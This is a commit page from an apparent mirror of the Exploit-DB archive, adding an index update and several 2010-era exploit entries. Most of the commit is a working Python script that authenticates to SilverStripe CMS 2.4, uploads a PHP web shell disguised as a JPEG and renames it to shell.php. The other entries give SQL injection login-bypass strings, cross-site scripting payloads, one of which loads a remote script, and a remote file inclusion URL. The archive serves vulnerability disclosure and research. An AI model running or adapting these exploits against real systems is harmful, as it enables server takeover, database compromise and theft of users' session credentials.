bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_21_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-21 04:37:32 +00:00
parent 79bbca8527
commit b640b49bf8
10 changed files with 236 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -30700,6 +30700,7 @@ id,file,description,date,author,platform,type,port
34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution Vulnerability",2014-07-16,"Cal Leeming",multiple,dos,0
34091,platforms/php/webapps/34091.txt,"Pay Per Minute Video Chat Script 2.x SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0
34092,platforms/jsp/webapps/34092.txt,"JForum 2.1.8 'bookmarks' Module Multiple HTML Injection Vulnerabilities",2010-06-06,"Adam Baldwin",jsp,webapps,0
34093,platforms/windows/dos/34093.txt,"EA Battlefield 2 1.41 and Battlefield 2142 1.50 - Multiple Denial Of Service Vulnerabilities",2010-06-07,"Francis Lavoie-Renaud",windows,dos,0
34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver '.ar' File Buffer Overflow Vulnerability",2010-01-15,R3d-D3V!L,windows,dos,0
34095,platforms/php/webapps/34095.txt,"PonVFTP 'login.php' SQL Injection Vulnerability",2010-01-15,S2K9,php,webapps,0
34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0
@ -30711,3 +30712,11 @@ id,file,description,date,author,platform,type,port
34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 'key' Parameter Cross Site Scripting Vulnerability",2010-06-07,"High-Tech Bridge SA",php,webapps,0
34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 'url' Parameter Cross Site Scripting Vulnerability",2009-01-08,"Patrick Webster",java,webapps,0
34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Include Vulnerabilities",2010-06-03,"High-Tech Bridge SA",php,webapps,0
34110,platforms/php/webapps/34110.txt,"PG Auto Pro SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-09,Sid3^effects,php,webapps,0
34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection Vulnerabilities",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0
34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 File Renaming Security Bypass Vulnerability",2010-06-09,"John Leitch",php,webapps,0
34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component Cross Site Scripting Vulnerability",2010-06-09,Sid3^effects,php,webapps,0
34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 'page' Parameter Cross Site Scripting Vulnerability",2010-06-07,"Adam Baldwin",windows,remote,0
34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0
34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta showcase2search.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0
34118,platforms/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 Multiple Cross Site Scripting Vulnerabilities",2010-01-18,indoushka,php,webapps,0

Can't render this file because it is too large.

10
platforms/multiple/webapps/34111.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/40676/info
GREEZLE - Global Real Estate Agent Site is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example data are available:
user: a' or '1'='1
password: a' or '1'='1

15
platforms/php/webapps/34110.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/40664/info
PG Auto Pro is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example URIs are available:
SQL Injection
http://www.example.com/vehicle/buy_do_search/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicle%2Fbuy_do_search&page=[SQL Injection]
Cross Site Scripting
http://www.example.com/vehicle/buy_do_search/?order_direction=[XSS]

148
platforms/php/webapps/34113.py Executable file
View file

@ -0,0 +1,148 @@
source: http://www.securityfocus.com/bid/40679/info
SilverStripe CMS is prone to a security-bypass vulnerability.
An attacker can exploit this vulnerability to rename uploaded files on the affected webserver. Successful exploits may allow attackers to execute arbitrary code within the context of the affected webserver.
SilverStripe CMS 2.4.0 is vulnerable; other versions may also be affected.
import sys, socket, re
host = 'www.example.com'
path = '/silverstripe'
username = 'admin'
password = 'Password1'
port = 80
def send_request(request):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send(request)
resp = ''
while 1:
r = s.recv(8192)
if not r: break
resp += r
if r[:15] == 'HTTP/1.1 302 OK': break
s.close()
return resp
def upload_shell():
print 'authenticating'
content = 'AuthenticationMethod=MemberAuthenticator&Email=' + username + '&Password='+ password + '&action_dologin=Log+in'
header = 'POST http://' + host + path + '/Security/LoginForm HTTP/1.1\r\n'\
'Host: ' + host + '\r\n'\
'Connection: keep-alive\r\n'\
'User-Agent: x\r\n'\
'Content-Length: ' + str(len(content)) + '\r\n'\
'Cache-Control: max-age=0\r\n'\
'Origin: http://' + host + '\r\n'\
'Content-Type: application/x-www-form-urlencoded\r\n'\
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
'Accept-Encoding: gzip,deflate,sdch\r\n'\
'Accept-Language: en-US,en;q=0.8\r\n'\
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
'\r\n'
resp = send_request(header + content)
print 'uploading shell'
match = re.findall(u'Set-Cookie:\s([^\r\n]+)', resp)
for m in match:
if m[:9] == 'PHPSESSID':
cookie = m
content = '------x\r\n'\
'Content-Disposition: form-data; name="ID"\r\n'\
'\r\n'\
'0\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="FolderID"\r\n'\
'\r\n'\
'0\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="action_doUpload"\r\n'\
'\r\n'\
'1\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="Files[1]"; filename=""\r\n'\
'\r\n'\
'\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="Files[0]"; filename="shell.jpg"\r\n'\
'Content-Type: image/jpeg\r\n'\
'\r\n'\
'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n'\
'\r\n'\
'\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="action_upload"\r\n'\
'\r\n'\
'Upload Files Listed Below\r\n'\
'------x--\r\n'\
header = 'POST http://' + host + path + '/admin/assets/UploadForm HTTP/1.1\r\n'\
'Host: ' + host + '\r\n'\
'Proxy-Connection: keep-alive\r\n'\
'User-Agent: x\r\n'\
'Content-Length: ' + str(len(content)) + '\r\n'\
'Cache-Control: max-age=0\r\n'\
'Origin: http://' + host + '\r\n'\
'Content-Type: multipart/form-data; boundary=----x\r\n'\
'Accept: text/html\r\n'\
'Accept-Encoding: gzip,deflate,sdch\r\n'\
'Accept-Language: en-US,en;q=0.8\r\n'\
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
'Cookie: ' + cookie + '\r\n'\
'\r\n'
resp = send_request(header + content)
print 'grabbing ids'
file_id = re.search(u'/\*\sIDs:\s(\d+)\s\*/', resp).group(1)
file_name = re.search(u'/\*\sNames:\s([^\*]+)\s\*/', resp).group(1)
resp = send_request('GET http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1 HTTP/1.1\r\n'\
'Host: ' + host + '\r\n'\
'Cookie: ' + cookie + '\r\n\r\n')
print 'renaming shell'
security_id = re.search(u'name="SecurityID" value="(\d+)"', resp).group(1)
owner_id = re.search(u'option selected="selected" value="(\d+)"', resp).group(1)
content = 'Title=' + file_name + '&Name=shell.php&FileType=JPEG+image+-+good+for+photos&Size=56+bytes&OwnerID=' + owner_id + '&Dimensions=x&ctf%5BchildID%5D=' + file_id + '&ctf%5BClassName%5D=File&SecurityID=' + security_id + '&action_saveComplexTableField=Save'
header = 'POST http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/DetailForm HTTP/1.1\r\n'\
'Host: ' + host + '\r\n'\
'Proxy-Connection: keep-alive\r\n'\
'User-Agent: x\r\n'\
'Referer: http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1\r\n'\
'Content-Length: ' + str(len(content)) + '\r\n'\
'Cache-Control: max-age=0\r\n'\
'Origin: http://' + host + '\r\n'\
'Content-Type: application/x-www-form-urlencoded\r\n'\
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
'Accept-Encoding: gzip,deflate,sdch\r\n'\
'Accept-Language: en-US,en;q=0.8\r\n'\
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
'Cookie: ' + cookie + '; PastMember=1\r\n'\
'\r\n'
resp = send_request(header + content)
print 'shell located at http://' + host + path + '/assets/shell.php'
upload_shell()

7
platforms/php/webapps/34114.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40690/info
The JForJoomla JReservation component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/cd-hotel/Property-Cpanel.html?pid=">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>

9
platforms/php/webapps/34116.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40709/info
Bits Video Script is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
Bits Video Script 2.05 Gold Beta is vulnerable; other versions may also be affected.
http://www.example.com/Video/showcasesearch.php?rowptem[template]=http://www.example.net/c.txt?

9
platforms/php/webapps/34117.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40709/info
Bits Video Script is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
Bits Video Script 2.05 Gold Beta is vulnerable; other versions may also be affected.
http://www.example.com/Video/showcase2search.php?rowptem[template]=[EV!L]

11
platforms/php/webapps/34118.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/40711/info
Hitmaaan Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Hitmaaan Gallery 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/1367_hitmaaan-13/?gall=fonds&levela=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
http://www.example.com/1367_hitmaaan-13/?gall=<img+src=http://127.0.0.1./Utilisateur.gif+onload=alert(213771818860)>&levela=indoushka@hotmail.com&num_page=1

9
platforms/windows/dos/34093.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40605/info
Battlefield 2 and Battlefield 2142 are prone to multiple remote denial-of-service vulnerabilities because the applications fail to properly handle specially crafted network packets.
An attacker can exploit these issues to cause the applications to become unresponsive or to crash the affected game servers, denying service to legitimate users.
Battlefield 2 1.41 and Battlefield 2142 1.50 are vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/34093.zip

9
platforms/windows/remote/34115.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40708/info
McAfee Unified Threat Management (UTM) Firewall (formerly SnapGear) is prone to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
UTM Firewall firmware versions 3.0.0 through 4.0.6 are vulnerable.
http://example.net/cgi-bin/cgix/help?&page=web_list_block“><script src=“http://example.com/xss.js”></script>